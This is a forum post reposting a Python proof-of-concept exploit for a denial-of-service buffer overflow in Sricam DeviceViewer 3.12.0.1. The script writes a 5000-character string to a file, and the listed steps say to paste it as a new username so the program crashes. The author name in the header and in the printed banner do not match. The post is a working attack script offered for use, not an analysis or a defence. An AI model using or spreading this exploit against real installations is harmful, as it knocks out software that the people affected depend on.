This CHT Posted November 4, 2022 Share Posted November 4, 2022 #!/usr/bin/python # Exploit Title: DeviceViewer 3.12.0.1 - 'creating user' DOS buffer overflow # Date: 9/23/2019 # Exploit Author: x00pwn # Vendor Homepage: http://www.sricam.com/ # Software Link: http://download.sricam.com/Manual/DeviceViewer.exe # Version: v3.12.0.1 # Tested on: Windows 7 # Steps to reproduce: # 1. Generate a malicious payload via the POC # 2. In the Sricam application create a new user # 3. When creating a new user, set the username as the malicious payload # 4. Observe a program DOScrash payload = "A" * 5000 try: evilCreate =open("exploit.txt","w") print(""" DeviceViewer 3.12.0.1 DOS exploit POC Author: Nu11pwn """) print("[x] Creating malicious file") evilCreate.write(payload) evilCreate.close() print("[x] Malicious file create") print("[x] When creating a new user, set the username to the file contents") print("[x] Watch the program crash") except: print("[!] File failed to be created") Link to post Link to comment Share on other sites More sharing options...
Recommended Posts